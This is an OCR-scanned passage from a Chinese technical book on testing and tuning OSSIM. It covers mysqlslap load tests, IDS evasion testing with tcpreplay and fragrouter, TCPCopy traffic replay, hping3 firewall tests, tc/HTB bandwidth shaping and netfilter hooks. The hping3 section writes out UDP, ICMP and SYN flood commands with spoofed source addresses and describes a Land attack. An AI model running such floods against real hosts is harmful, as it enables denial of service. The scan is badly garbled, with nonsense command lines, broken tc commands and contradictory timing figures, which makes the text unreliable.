使 用 系统 自 带 的 脚本 测试 ， 增 加 auto_increment 列 、int4 列 和 char35 列 ， 测试 2 种 引擎 


myisam、innodb 读 的 性 能 分 别 用 50、200、400 个 客户 端 对 服务 器 进行 测试 ， 总 共 200 个 查询 
句 ， 执 行 20 次 查询 。 如 图 10.96 所 示 。 


图 10.96 使 用 系统 自 带 的 脚本 测试 
从 上 图 显示 的 第 一 项 结果 看 ，50 个 并 发 客户 端 、 平 均 每 个 客户 端 4 个 查询 、20 次 查询 中 
最 少 的 时 间 是 0.170 秒 ， 最 多 0.124 秒 ， 平 均 0.263 秒 。 
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(3) 实例 三 
这 里 我 们 可 以 使 用 Ossim 系统 中 自 带 的 sql 脚本 ， 例 如 : 


#mysqlslap —create=/usr/share/doc/ossim-mysql/contrib./plugins/sap.sql 
—query=/usr/share/doc/ossim-mysql/contrib/plugins/sap.sql 
-concurrency=50,100,200 -iterations=20 -engine=myisam, innodb 


—socket=/var/run/mysqld/mysqld.sock -uroot ~-pXhsksvpjKj 


运行 结果 如 图 10.97 所 示 。 


图 10.97 运行 Ossim 系统 中 自 带 的 sql 脚本 


4.IDS 测试 工具 Nidsbench 


测试 工具 Nidsbench 的 下 载 地 址 为 http://dl.packetstormsecurity.net/UNIX/IDS/nidsbench/ 
nidsbench.html。Nidsbench 工具 包 中 包括 两 款 工具 , 都 包含 在 BTS 光盘 中 , 下 面 分 别 介绍 一 下 。 


(1) Tcpreplay 
tcpreplay 是 个 很 好 的 包 转 发 工具 ， 它 可 以 直接 用 tcpdump 抓 包 工具 保存 的 pcap 文件 来 模 
拟 真实 的 网 络 数据 环境 。 也 就 是 采用 tcpdump+Tcpreplay 或 者 wireshark+Tcpreplay 用 来 回放 在 
线 流 量 ， 简 单 来 讲 tcpdump 是 用 于 抓 数 据 包 ，Tcpreplay 则 是 用 于 流量 重 放 。 
另外 一 个 优点 就 是 可 以 通过 附带 的 tcprewrite 工具 对 数据 包 的 内 容 (IP 地 址 、MAC 等 ) 
根据 需要 进行 修改 。 
tcpreplay 的 安装 在 Bt 和 Deft 系统 下 非常 方便 ， 使 用 以 下 命令 即 可 : 


#apt-get install tcpreplay 
安装 Tcpreplay 包 时 ， 默 认 情 况 下 安装 以 下 3 个 工具 ， 分 别 为 : 


@ tcpprep: 用 来 划分 客户 端 和 服务 器 ， 和 区 分 pcap 数据 包 的 流向 ， 即 划分 哪些 数据 包 是 
从 Client 端 发 出 的 ， 哪 些 数据 包 是 从 Server 端的 。 

@ tcprewrite: 此 工具 用 来 修改 2 层 (MAC 地 址 )、3 层 (他 x 地 址 ) 以 及 4 层 (PORT 地 
址 ) 的 报 文 。 

@ tcpreplay: 它 是 真正 用 来 发 包 使 用 的 工具 ， 可 以 选择 主 网 卡 、 从 网 卡 、 发 包 速 度 等 。 


(2) fragrouter 
Nidsbench 是 国外 Anzen 公司 开发 的 一 套 测试 软件 ， 包 括 tcpreplay 和 fraqrouter 两 部 分 。 
tcpreplay 的 功能 是 将 tcpdump 复制 的 数据 分 组 重 放 ， 还 原 网 络 的 实际 运行 状态 ， 而 fraqrouter 
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的 功能 是 通过 构造 一 系列 躲避 IDS 检测 的 攻击 以 测试 检测 系统 的 正确 性 和 安全 性 。 


在 测试 过 程 中 ， 将 NidsBench 软件 在 测试 机 2 上 启动 ， 作 为 攻击 主机 (测试 机 1) 向 目标 


主机 (测试 机 3) 的 所 有 攻击 都 经 过 测试 机 2 上 的 fragrouter 转发 ，fragrouter 可 以 将 数据 包 按 
要 求 大 小 分 片 ， 以 此 来 隐藏 攻击 行为 。 同 时 也 检测 Ossim 上 的 Snort 是 否 可 以 很 好 的 识别 分 片 
的 攻击 。tcpreplay 将 正常 的 网 络 流量 重 放 ， 并 且 支 持 重 放 速 度 调 节 ， 可 以 测试 IDS 在 各 种 负 
荷 情况 下 的 检测 效率 。 


5. TcpCopy 
由 于 在 系统 压力 大 时 无 法 使 用 tcpdump 会 出 现 丢 包 情 况 ) ， 而 且 tcpreplay 是 一 种 离线 


加 


对 


放 , 可 能 导致 tcpreplay 回放 的 时 候 , 网 络 环 境 可 能 已 经 和 抓 包 时 不 同 。 最 重要 的 是 tcpreplay 
上 层 应 用 无 效 。 基于 这 些 原因 我 们 采用 tcpcopy 工具 进行 在 线 回 放 。TCPCopy 主要 用 来 解决 


TCP 层 及 其 以 上 《如 http 协议 ，Ftp 协议 ) 的 流量 复制 问题 ， 适 用 于 Server 的 流量 回放 。 而 且 
TCPCopy 是 基于 session 的 ， 一 个 TCP 连接 ， 一 个 session， 它 由 4 部 分 所 组 成 ， 分 别 是 源 下 
地 址 、 源 端口 、 目 的 卫 和 目的 端口 。 了 解 了 这 些 我 们 进行 一 下 实战 。 


(1) Tepcopy 安装 


https://github .com/wangbin579/tcpcopy/contributors 
./configure --enable-debug \\* 输 出 5 分 钟 的 日 志 信息 
make;make install 


(2) 测试 
在 测试 服务 器 端 操 作 如 下 : 
# iptables -I OUTPUT -p tcp --sport port -jij NFQUEUE 


由 于 现在 的 Linux 主要 发 行 版 Kernel 都 在 3.5 以 上 , 所 以 默认 就 采用 了 NFQueue, 所 以 不 


用 手工 再 次 加 载 ， 如 果 在 2.6 内 核 的 机 器 上 就 需要 输入 一 下 命令 , 注意 ，iptables 命令 中 的 port 
是 变量 ， 应 根据 具体 应 用 项 目 而 定 。 如 果 是 测试 Web 服务 一 般 是 80 端口 。 


# modprobe ip_queue 
# ./intercept 


在 在 线 服务 器 端 操 作 如 下 : 
# ./tcpcopy -x localServerPort-targetServerIP:targetServerPort 


对 于 -x 参数 的 格式 : -x <transfer,> 。 其 中 transfer 具体 格式 如 下 : 
服务 器 对 外 IP 地 址 :服务 器 应 用 端口 号 -测试 服务 器 他 地 址 :测试 服务 器 应 用 端口 , 或 者 服 


务 器 应 用 端口 号 -测试 服务 器 人 P 地 址 :测试 服务 器 应 用 端口 。Transfer 之 间 用 “,” 阳 开 ，IP 地 
址 和 端口 号 之 间 用 “:” 隔 开 ， 服 务 器 应 用 端口 号 和 测试 服务 器 人 P 地 址 之 间 用 “-” 隔 开 。 


比如 举 个 下 面 的 例子 : 
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#./tcpcopy -x 80-192.168.0.2:18080 


复制 在 线 机 器 的 80 端口 应 用 的 请 求 到 192.168.0.2 上 面 的 18080 端口 ， 另 外 还 可 以 通过 -n 
参数 或 者 -参数 放 大 在 线 压力 ， 更 多 参数 大 家 参考 tcpcopy -h 可 以 得 到 帮助 文档 。 


(3) 流量 检测 

当 命令 发 出 我 们 需要 查看 流量 是 否 过 来 有 两 种 方法 : 

@ 使 用 传统 的 netstat 命令 : 

#netstat -at |1grep <port>|wc -1 

@ 使 用 nethogs。 首 先 安装 ， 然 后 就 可 以 应 用 ， 操 作 命令 如 下 : 


#apt-get install nethogs 
#nethogs eth0 


(4) 停止 测试 方法 


在 启动 测试 时 先 打开 intercept， 再 打开 tcpcopy， 如 果 停 止 测试 那么 先 关 闭 tcpcopy， 再 关 
闭 intercept。 


10.9.4 ”BT 中 的 网 络 压力 测试 工具 


在 BT 光盘 中 Applications 一 BackTrack 一 Stress Testing 一 Network Stress Testing 菜单 下 提供 
了 6 个 压力 测试 工具 我 们 可 以 拿 它 作为 防火 墙 /IDS/IPS 的 性 能 测试 工具 ， 下 面 以 hping 工具 举 
例 : 

hping 是 一 个 命令 行 下 使 用 的 TCP/IP 数据 包 组 装 /分 析 工 具 ， 其 命令 模式 很 像 Unix 下 的 
ping 命令 , 但 是 它 不 是 只 能 发 送 ICMP 回应 请 求 , 它 还 可 以 支持 TCP、UDP、ICMP 和 RAW-IP 
协议 ， 因 此 它 成 为 了 安全 审计 、 防 火 墙 测 试 工作 中 的 标 配 工具 。 


1 防火 墙 测试 


使 用 hping3 指定 各 种 数据 包 字 段 ， 依 次 对 防火 墙 进行 详细 测试 。 请 参考 网 页 
http://0daysecurity.com/articles/hping3_examples.html。 

测试 防火 墙 对 ICMP 包 的 反应 、 是 否 支 持 Traceroute、 是 否 开放 某 个 端口 、 对 防火 墙 进 行 
拒绝 服务 攻击 (DoS attack) 。 

例如 ， 以 LandAttack 方式 测试 目标 防火 墙 (Land Attack 是 将 发 送 源 地 址 设置 为 与 目标 地 
址 相同 ， 诱 使 目标 机 与 自己 不 停 地 建立 连接 ) : 


着 PPpEnRO3SS COORESIOSLOSLO LO p21 1010530>10 
产生 UDP flood with hping3 is easy: 


#hping3 -qd -n -a 10.0.0.1 --udp -s 53 --keep -p 68 --flood 192.168.0.2 
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ICMP flood 测试 : 

#hping3 -ql=m=a 10%0.0°1 ==id 0 ==Eemp ~ 50 ==flood 192-.169%0.2 
SYN flood 测试 : 

hpingn qn a L000 Tn SI so keep p22 Fioo0 L922 M680 


10.0.0.1 为 设 定 源 地 址 ，192.168.0.2 为 目标 地 址 。 
构造 源 地 址 为 192.168.10.99， 并 使 用 1000 微 秒 的 间隔 发 送 各 个 SYN 包 。 


#nping3 一 ILeth0 “al92.168.10.99 -8S 192-169.10533 =p 80"=1 L000 


2. 负载 检测 


Debian Linux 系统 性 能 非常 不 错 , 不 过 有 时 候 由 于 加 载 了 不 必要 的 服务 或 启动 过 多 的 监听 
或 扫描 ， 那 么 同样 会 拖 垮 系统 ，Ossim 系统 不 像 对 外 访问 的 网 站 有 大 量 访问 ， 它 只 会 去 收集 数 
据 包 分 析 它 ， 所 以 对 于 他 的 负载 高 低 的 判断 和 以 往 的 Web 服务 器 还 不 太一 样 ，Ossim 系统 在 
哪些 情况 下 会 高 负载 或 者 出 现 无 法 连接 呢 ? 当 系 统 出 现 过 多 机 器 的 漏洞 扫描 ,此 时 系统 出 现 
nessus_jobs.pl 和 openvassd 进程 占用 大 量 CPU 利用 率 和 磁盘 1/O, 这 时 如 何 去 分 析 呢 ， 还 是 用 
top 命令 ， 其 中 的 id4% 和 wa% 的 数值 都 是 运行 idle 进程 时 的 统计 : 


@ id%: idle 的 意思 ， 代 表 CPU 上 没有 可 运行 的 任务 ， 并 且 没有 任务 在 等 待 io。 

@ wa%: iowait 意思 ,代表 CPU 上 没有 可 运行 的 任务 , 但 是 有 任务 在 等 待 io, 也 就 是 说 ， 
如 果 当 前 时 间 片 用 来 空转 ， 是 因为 需要 iowait， 所 以 实际 的 idle 是 两 者 之 和 ， 如 果 发 
现 过 高 ， 可 以 使 用 iostat、vmstat 命令 继续 查看 。 


经 过 观察 ， 如 果 发 现 wa% 的 数值 一 直 比 较 高 ， 很 有 可 能 是 磁盘 IO 遇 到 瓶 开 ， 这 个 时 候 
就 要 分 析 磁 盘 WO。 那 么 如 何 避 免 Ossim 过 载 呢 ? 首先 在 硬件 配置 要 满足 基本 条 件 ， 目 前 最 新 
发 布 版 Ossim 4.3 配置 至 强 处 理 器 ，8GB 以 上 内 存 ，SAS 或 SSD 硬盘 ， 这 样 可 以 大 大 提高 磁 
盘 的 IO 水 平 。 

另外 ， 我 们 还 可 以 选用 Iperf 这 一 开源 工具 测试 网 络 带宽 的 情况 ， 用 科 来 数据 包 生 成 器 发 
送 各 种 包 用 以 检测 IDS 的 性 能 。 好 了 ， 经 过 以 上 这 些 工具 测试 可 以 模拟 真实 环境 ， 提 前 查 出 
问题 增强 上 线 信心 。 


10.10 ”运用 TC 工具 控制 网 络 流量 


众所周知 , 在 互联 网 诞生 之 初 都 是 各 个 高 校 和 科研 机 构 相 互通 信 , 并 没有 网 络 流量 控制 方 
面 的 考虑 和 设计 ，IP 协议 的 原则 是 尽 可 能 好 地 为 所 有 数据 流 服务 ， 不 同 的 数据 流 之 间 是 平等 
的 。 然 而 多 年 的 实践 表明 ， 这 种 原则 并 不 是 最 理想 的 ， 有 些 数据 流 应 该 得 到 特别 的 照顾 ， 如 远 
程 登录 的 交互 数据 流 应 该 比 数据 下 载 拥 有 更 高 的 优先 级 。 

针对 不 同 的 数据 流 采取 不 同 的 策略 ， 这 种 可 能 性 是 存在 的 ， 并 且 随 着 研究 的 发 展 和 深入 ， 
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人 们 已 经 提出 了 各 种 不 同 的 管理 模式 。IETF 已 经 发 布 了 几 个 标准 ， 如 综合 服务 (Integrated 
Services) 、 区 分 服务 (Diferentiated Services) 等 。 其 实 ，Linux 内 核 从 2.2 开始 ， 就 已 经 实现 
了 相关 的 流量 控制 功能 ， 而 且 在 Ossim 4.x 系统 中 就 集成 了 TC 工具 ， 大 家 可 以 直接 使 用 。 本 
节 将 介绍 Linux 中 有 关 流 量 控制 的 相关 概念 、 用 于 流量 控制 的 工具 TC 的 使 用 方法 ， 并 给 出 几 
个 有 代表 性 的 实例 。 


10.10.1 相关 概念 


本 节 将 介绍 网 络 出 口 处 的 流量 控制 。 流 量 控制 的 一 个 基本 概念 是 队列 〈Qdise) ， 每 个 网 
卡 都 与 一 个 队列 相 联系 , 每 当 内 核 需 要 将 报 文 分 组 从 网 卡 发 送出 去 时 , 都 会 首先 将 该 报 文 分 组 
添加 到 该 网 卡 所 配置 的 队列 中 ,由 该 队列 决定 报 文 分 组 的 发 送 顺序 。 因 此 可 以 说 , 所 有 的 流量 
控制 都 发 生 在 队列 中 ， 详 细 流 程 图 如 图 10.98 所 示 。 


图 10.98 报 文 在 Linux 内 部 的 流程 图 


有 些 队 列 的 功能 是 非常 简单 的 , 它们 对 报 文 分 组 实行 先 来 先 走 的 策略 。 有 些 队 列 则 功能 复 
杂 ， 会 将 不 同 的 报 文 分 组 进行 排队 、 分 类 ， 并 根据 不 同 的 原则 ， 以 不 同 的 顺序 发 送 队列 中 的 报 
文 分 组 。 为 了 实现 这 样 的 功能 ， 这 些 复杂 的 队列 需要 使 用 不 同 的 过 滤器 〈Filter) ， 来 把 报 文 
分 组 分 成 不 同 的 类 别 〈Class) 。 这 里 把 复杂 的 队列 称 为 可 分 类 〈Classful) 的 队列 。 通 常 ， 要 
实现 功能 强大 的 流量 控制 , 可 分 类 的 队列 是 必 不 可 少 的 。 因 此 , 类 别 〈Class) 和 过 滤器 (Filter) 
也 是 流量 控制 的 另外 两 个 重要 的 概念 。 如 图 10.99 所 示 ， 是 一 个 可 分 类 队列 的 例子 。 


类 别 2 子 队列 


图 10.99 “多 类 别 队列 
由 图 10.99 可 以 看 出 ， 类 别 〈Class) 和 过 滤器 (Filter) 都 是 队列 的 内 部 结构 ， 并 且 可 分 类 的 
队列 可 以 包含 多 个 类 别 ， 同 时 ， 一 个 类 别 又 可 以 进一步 包含 子 队列 或 者 子 类 别 。 所 有 进入 该 类 别 
的 报 文 分 组 可 以 依据 不 同 的 原则 放 入 不 同 的 子 队列 或 子 类 别 中 ， 依 次 类 推 。 而 过 滤器 (Filter) 是 
队列 用 来 对 数据 报 文 进行 分 类 的 工具 ， 它 决定 一 个 数据 报 文 将 被 分 配 到 哪个 类 别 中 。 
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10.10.2 使 用 TC 


在 Linux 中 ,流量 控制 都 是 通过 TC 这 个 工具 来 完成 的 。 通 常 ， 要 对 网 卡 进行 流量 控制 的 
配置 ， 需 要 进行 如 下 的 操作 : 


为 网 卡 配置 一 个 队列 。 

加 在 该 队列 上 建立 分 类 。 

国 根据 需要 建立 子 队列 和 子 分 类 。 
为 每 个 分 类 建立 过 滤器 。 


在 Linux 中 ， 可 以 配置 很 多 类 型 的 队列 ， 如 CBQ、HTB 等 ， 其 中 CBQ 比较 复杂 ， 不 容 
易 理 解 。HTB (Hierarchical Token Bucket) 是 一 个 可 分 类 的 队列 , 与 其 他 复杂 的 队列 类 型 相 比 ， 
HTB 具有 功能 强大 、 配 置 简单 及 容易 上 手 等 优点 。 在 TC 中 ， 使 用 “major:minor” 这 样 的 句 
柄 来 标识 队列 和 类 别 ， 其 中 major 和 minor 都 是 数字 。 

对 于 队列 来 说 ，minor 总 为 0， 即 “major:0” 这 样 的 形式 ， 也 可 以 简写 为 “major”， 如 队 
列 “1:0” 可 以 简写 为 “1:”。 需 要 注意 的 是 ，major 在 一 个 网 卡 的 所 有 队列 中 必须 是 唯一 的 。 
对 于 类 别 来 说 ， 其 major 必须 和 它 的 父 类 别 或 父 队列 的 major 相同 ， 而 minor 在 一 个 队列 内 部 
则 必须 是 唯一 的 (因为 类 别 肯 定 是 包含 在 某 个 队列 中 的 ) 。 举 个 例子 ， 如 果 队 列 “2:” 包 含 两 
个 类 别 ， 则 这 两 个 类 别 的 句柄 必须 是 “2:x” 这 样 的 形式 ， 并 且 它 们 的 x 不 能 相同 ， 如 2:1 和 
2:2。 

下 面 ， 将 以 HTB 队列 为 主 ， 结 合 需求 来 讲述 TC 的 使 用 。 假 设 etho 出 口 有 100Mbits 的 
带宽 ， 分 配给 WWW、E-mail 和 Telnet 三 种 数据 流量 ， 其 中 分 配给 WWW 的 带宽 为 40Mbit/s， 
分 配给 E-mail 的 带宽 为 40Mbit/s， 分 配给 Telnet 的 带宽 为 20Mbit/s， 如 图 10.100 所 示 。 


图 10.100 ”带宽 分 配 实例 
需要 注意 的 是 ， 在 TC 中 使 用 下 列 的 缩写 表示 相应 的 带宽 : 


@ Kbps，kilobytes per second， 即 千 字 节 每 秒 。 
@ Mbps，megabytes per second， 即 兆 字 节 每 秒 。 
@ Kbit，kilobits per second， 即 千 比 特 每 秒 。 

@ Mbit，megabits per second， 即 兆 比特 每 秒 。 
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10.10.3 创建 HTB 队列 
有 关 队列 的 TC 命令 的 一 般 形式 为 : 


#tc qdisc [addlchangel|lreplacel|llink] dev DEV [parent qdisk-idl|root] [handle 


qdisc-id] qdisc[qdisc specific parameters] 
首先 ， 需 要 为 网 卡 eth0 配置 一 个 HIB 队列 ， 可 使 用 下 列 命 令 : 
#tc qdisc add dev eth0 root handle 1:htb default 11 


这 里 , 命令 中 的 add 表示 要 添加 , dev eth0 表示 要 操作 的 网 卡 为 eth0。 root 表示 为 网 卡 eth0 
添加 的 是 一 个 根 队列 。“handle 1:” 表 示 队 列 的 句柄 为 “1:”。htb 表示 要 添加 的 队列 为 HTB 
队列 。 命 令 最 后 的 default 11 是 HTB 特有 的 队列 参数 ， 意 思 是 所 有 未 分 类 的 流量 都 将 分 配给 
类 别 1:11。 


10.10.4 “为 根 队列 创建 相应 的 类 别 
有 关 类 别 的 TC 命令 的 一 般 形式 为 : 


#tc class [addlchange|replace] dev DEV parent qdisc-id [classid class-id] gdisc 


[qdisc specific parameters] 


可 以 利用 下 面 这 三 个 命令 为 根 队列 1 创建 三 个 类 别 ， 分 别 是 1:11、1:12 和 1:13， 它 们 分 
别 占 用 40Mbit、40Mbit 和 20Mbit 的 带宽 : 


#tc class add dev eth0 parent 1: classid 1:1 htb rate 40mbit ceil 40mbit 
#tc class add dev eth0 parent 1: classid 1:12 htb rate 40mbit ceil 40mbit 
#tc class add dev eth0 parent 1: cllassid 1:13 htb rate 20mbit ceil 20mbit 


命令 中 ，“parent 1:” 表 示 类 别 的 父亲 为 根 队 列 “1:”。“classid1:11” 表 示 创 建 一 个 标识 
为 1:11 的 类 别 ，“rate 40Mbit” 表 示 系 统 将 为 该 类 别 确保 带宽 40Mbit，“ceil 40Mbit” 表 示 该 
类 别 的 最 高 可 占用 带宽 为 40Mbit。 
10.10.5 ”为 各 个 类 别 设置 过 滤器 

有 关 过 滤器 的 TC 命令 的 一 般 形式 为 : 


#tc filter [addlchange1replace] dev DEV [parent qdisc-id|root] protocol 


protocol prio priority filtertype [filtertype specific parameters] flowid flow-id 


由 于 需要 将 WWW、E-mail、Telnet 三 种 流量 分 配 到 三 个 类 别 , 即 上 述 1:11、1:12 和 1:13， 
因此 ， 需 要 创建 三 个 过 滤器 ， 如 下 面 的 三 条 命令 所 示 : 
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#tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip dport 80 
Oxffff flowid 1:11 

#tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip dport 25 
Oxffff flowid 1:12 

#tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip dport 23 
Oxffff flowid 1:13 


这 里 ，protocol ip 表示 该 过 滤器 应 该 检查 报 文 分 组 的 协议 字段 。Prio 1 表示 它们 对 报 文 处 
理 的 优先 级 是 相同 的 , 对 于 不 同 优先 级 的 过 滤器 , 系统 将 按照 从 小 到 大 的 优先 级 顺序 来 执行 过 
滤器 ,对 于 相同 的 优先 级 ， 系 统 将 按照 命令 的 先后 顺序 执行 。 这 几 个 过 滤器 还 用 到 了 u32 选择 
器 (命令 中 u32 后 面 的 部 分 ) 来 匹配 不 同 的 数据 流 。 以 第 一 个 命令 为 例 ,判断 的 是 dport 字段 ， 
如 果 该 字段 与 Oxffff 进行 与 操作 的 结果 是 80， 则 “flowid 1:11” 表 示 将 把 该 数据 流 分 配给 类 
别 1:11。 更 加 详细 的 有 关 TC 的 用 法 可 以 参考 TC 的 手册 。 


10.10.6 ”应 用 实例 


在 上 面 的 例子 中 ， 三 种 数据 流 WWW、E-mail、Telnet) 之 间 是 互相 排斥 的 。 当 某 个 数 
据 流 的 流量 没有 达到 配额 时 , 其 剩余 的 带宽 并 不 能 被 其 他 两 个 数据 流 所 借用 。 在 这 里 将 涉及 如 
何 使 不 同 的 数据 流 可 以 共享 一 定 的 带宽 。 

首先 需要 用 到 HTB 的 一 个 特性 ， 即 对 于 一 个 类 别 中 的 所 有 子 类 别 ， 它 们 将 共享 该 父 类 别 
所 拥有 的 带宽 ， 同时 ， 又 可 以 使 得 各 个 子 类 别 申请 的 各 自 带宽 得 到 保证 。 也 就 是 说 ， 当 某 个 数 
据 流 的 实际 使 用 带宽 没有 达到 其 配额 时 , 其 剩余 的 带宽 可 以 借 给 其 他 的 数据 流 。 而 在 借 出 的 过 
程 中 ， 如 果 本 数据 流 的 数据 量 增 大 ， 则 借 出 的 带宽 部 分 将 收回 ， 以 保证 本 数据 流 的 带宽 配额 。 

下 面 考 虑 这 样 的 需求 : 同样 是 三 个 数据 流 WWW、E-mail 和 Telnet， 其 中 的 Telnet 独立 分 
配 20Mbit/s 的 带宽 。 另 一 方面 ，WWW 和 E-mail 各 自分 配 40Mbits。 同 时 ， 它 们 又 是 共享 的 
关系 ， 即 它们 可 以 互相 借用 带宽 ， 如 图 10.101 所 示 。 


(WWW40M ™ 


需要 的 TC 命令 如 下 : 


图 10.101 互相 借用 带宽 实例 
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#tc 
#tc 
#tc 
#tc 
#tc 
#tc 


qdisc add dev 
class add dev 
class add dev 
class add dev 


class add dev 


eth0 
eth0 
eth0 
eth0 
eth0 


root handle 1: htb default 21 

partent 1: classid 1:1 htb rate 20mbit ceil 20mbit 
parent 1: classid 1:2 htb rate 80mbit ceil 80mbit 
parent 1: classid 1:21 htb rate 40mbit ceil 20mbit 
parent 1:2 classid 1:22 htb rate 40mbit ceil 80mbit 


filter add dev eth0 protocol parent 10 prio 1 u32 match ip dport 80 0xffff 


flowid 1:21 


#tc filter add dev eth0 Protocol parent 1:0 prio 1 u32 match ip dport 25 Oxffff 


flowid 1:22 


#tc filter add dev eth0 protocol parent 1:0 prio 1 u32 match ip dport 23 0xffff 


flowid 1:1 


这 里 为 根 队列 1 创建 两 个 根 类 别 , 即 1:1 和 1:2, 其 中 1:1 对 应 Telnet 数 据 流 ,1:2 对 应 80Mbit 
的 数据 流 。 然 后 ,在 1:2 中 ,创建 两 个 子 类 别 1:21 和 1:22, 分 别 对 应 WWW 和 E-mail 数据 流 。 
由 于 类 别 1:21 和 1:22 是 类 别 1:2 的 子 类 别 ， 因 此 它们 可 以 共享 分 配 80Mbit 的 带宽 。 同时， 又 
确保 当 需 要 时 ， 自 己 的 带宽 至 少 有 40Mbit。 

从 这 个 例子 可 以 看 出 ， 利 用 HTB 中 类 别 和 子 类 别 的 包含 关系 ， 可 以 构建 更 加 复杂 的 多 层 
次 类 别 树 ， 从 而 实现 更 加 灵活 的 带宽 共享 和 独占 模式 ， 达 到 企业 级 的 带宽 管理 目的 。 
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11.1 调整 netfilter 内 核 模 块 以 限制 P2P 连接 


随 着 Internet 技术 的 发 展 ， 对 于 一 些 中 小 型 企业 、 办 公 室 用 户 或 者 仅 具 有 有 限 带 宽 资源 的 
用 户 来 说 ， 他 们 一 般 采 用 NAT (Network Address Translation， 网 络 地 址 转换 ) 来 接 入 Internet， 
如 果 内 部 用 户 肆 无 忌 愉 地 使 用 P2P 进行 下 载 或 者 在 线 播放 ， 势 必 影 响 其 他 用 户 正常 使 用 网 络 ， 
可 如 果 把 P2P 的 端口 全 部 封杀 掉 , 用 户 就 享受 不 到 P2P 带 来 的 好 处 了 。Linux 由 于 其 开放 源 代 
码 的 特性 , 近年 来 得 到 了 迅速 的 发 展 ,作为 一 个 高 性 能 的 网 络 操作 系统 ， 其 内 核 中 的 防火 墙 扮 
演 着 非常 重要 的 角色 。 


11.1.1 netfilter 的 结构 框架 


1. Linux 防火 墙 发 展 历程 


最 开始 的 ipfwadm 是 AlanCox 在 Linux Kemel 发 展 的 初期 ， 从 FreeBSD 的 内 核 代 码 中 移 
植 过 来 的 。 后 来 经 历 了 ipchains， 再 经 由 Paul Russel 在 Linux Kernel 2.3 系列 的 开发 过 程 中 发 
展 了 netfilter 这 个 架构 。 而 用 户 空间 的 防火 墙 管理 工具 ， 也 相应 地 发 展 为 iptables。 在 经 历 了 
Linux Kemel 2.4 和 2.6 的 发 展 以 后 ， 可 以 说 ，netfilter iptables 经 受 住 了 大 量 用 户 广泛 使 用 的 考 
验 。 本 文 将 基于 Linux 2.6 的 内 核 来 进行 叙述 。 


2. 什么 是 netfilter 


netfilter 是 Linux 2.6 内 核实 现 的 防火 墙 框架 , 它 比 以 前 任何 一 版 Linux 内 核 的 防火 墙 子 系 
统 都 要 完善 强大 。netfilter 提供 了 一 个 抽象 、 通 用 的 框架 ， 该 框架 定义 了 一 个 子 功能 ， 实 现 的 
就 是 包 过 滤 子 系统 。netfilter 由 一 系列 基于 协议 栈 的 钧 子 组 成 ， 这 些 钧 子 都 对 应 某 一 具体 的 协 
议 。 


3.netfilter 在 IPv4 中 的 结构 


Linux 2.6 支持 对 IPv4、IPv6 及 DECnet 的 钧 子 〈 本 小 节 只 提 及 IPv4 的 钧 子 ) 。IPv4 协议 
栈 为 了 实现 对 netfilter 架构 的 支持 ,在 全 包 在 IPv4 协议 栈 上 的 游历 路 线 (如 图 11.1 所 示 ) 之 
中 选择 了 5 个 检查 点 ， 可 以 在 linux/netfilter ipv4.h 里 面 找到 这 些 符号 的 定义 ， 表 11.1 列 出 了 
IPv4 中 定义 的 钧 子 。 
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POSTROUTING 
一 
Coemmtmcr 
| 三 | i 
Na DNAT 
ee 
了 mesgle 


LOCALHOST 
图 11.1 netfilter 在 IPv4 中 的 结构 


表 11.1 IPv4 中 定义 的 钩子 
钩子 名 称 调用 时 机 


NF IP PRE ROUTING 完整 性 校 验 之 后 ， 路 由 决策 之 前 
NF IP LOCAL IN 目的 地 为 本 机 ， 路 由 决策 之 后 


NF IP FORWARD 数据 包 要 到 达 另 外 一 个 接口 
NF IP LOCAL OUT 本 地 进程 的 数据 ， 发 送出 去 的 过 程 中 


向 外 流出 的 数据 上 线 之 前 


在 这 5 个 检查 点 上 , 各 引入 了 一 行 对 NF_HOOKO 宏 函数 的 相应 调用 。 如 果 没 配置 防火 墙 ， 
NF_HOOK0O 便 从 netfilter 模块 转 回 到 IPv4 协议 栈 继续 往 下 处 理 。 如 果 配 置 了 防火 墙 ， 
NF_HOOKO 就 转 去 调用 nf_hook_slow0 函 数 ， 该 函数 会 按 顺 序 调用 在 该 检查 点 注册 的 钧 子 函 
数 ， 不 管 钩子 函数 对 数据 包 做 了 哪些 处 理 ， 它 都 必须 返回 表 11.2 中 的 一 个 预定 义 的 值 。 
NF_IP_PRE_ROUTING 钧 子 是 数据 包 接收 后 第 一 个 调用 的 钧 子 程序 ， 这 个 钧 子 在 后 面 编写 的 
模块 当中 将 会 被 用 到 。 


表 11.2 netfilter 的 返回 值 
返回 值 含义 


St 
六 人 

ET 

TR 

次 调用 这 个 多 了 二 
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NF_DROP 表示 要 丢弃 这 个 数据 包 ， 并 且 为 这 个 数据 包 申 请 的 所 有 资源 都 要 得 到 释放 。 
NF_ACCEPT 告诉 netfilter 到 目前 为 止 ， 这 个 数据 包 仍 然 可 以 被 接收 ， 应 该 将 它 移 到 网 络 堆栈 
的 下 一 层 。NF_STOLEN 是 非常 有 趣 的 一 个 返回 值 ， 它 告诉 netfilter 让 其 忘掉 这 个 数据 包 ， 也 
就 是 说 钩子 函数 会 在 这 里 对 这 个 数据 包 进行 完全 处 理 ， 而 netfilter 应 该 放弃 对 它 的 任何 处 理 。 
然而 这 并 不 意味 着 为 该 数据 包 申请 的 所 有 资源 都 要 释放 掉 。 这 个 数据 包 和 它 各 自 的 sk_buff 结 
构 体 依然 有 效 ， 只 是 钩子 函数 从 netfilter 夺取 了 对 这 个 数据 包 的 掌控 权 。 最 后 一 个 返回 值 
NF REPEAT， 就 是 当 用 户 改变 了 该 数据 包 包 头 的 某 些 信息 时 ， 那 可 以 请 求 netfilter 再 次 调用 
这 个 钧 子 函数 对 它 进行 操作 。 


4. 注册 和 注销 netfilter 钩 子 函 数 


在 上 面 提 到 了 nf_hook_slow0 函 数 会 按 顺 序 调用 在 该 检查 点 注册 的 钩子 函数 ， 那 钩子 函数 
是 怎样 注册 的 呢 ? 注 册 一 个 钧 子 函 数 是 围绕 nf hook ops 结构 体 的 简单 过 程 ， 在 
linux/netfilter.h 中 有 这 个 结构 体 的 定义 : 


struct nf hook ops 
{ 
struct list head list; 
nf hookfn *hook; 
Ent py 
int hooknum; 
int priority; 


}; 


这 个 结构 体 的 成 员 列表 主要 是 用 来 维护 注册 的 钧 子 函 数列 表 的 , 对 于 用 户 来 说 , 在 注册 时 
并 没有 多 么 重要 。list 是 一 个 有 prev 和 next 两 个 域 的 双向 链表 , 各 检查 点 的 钩子 函数 就 是 通过 
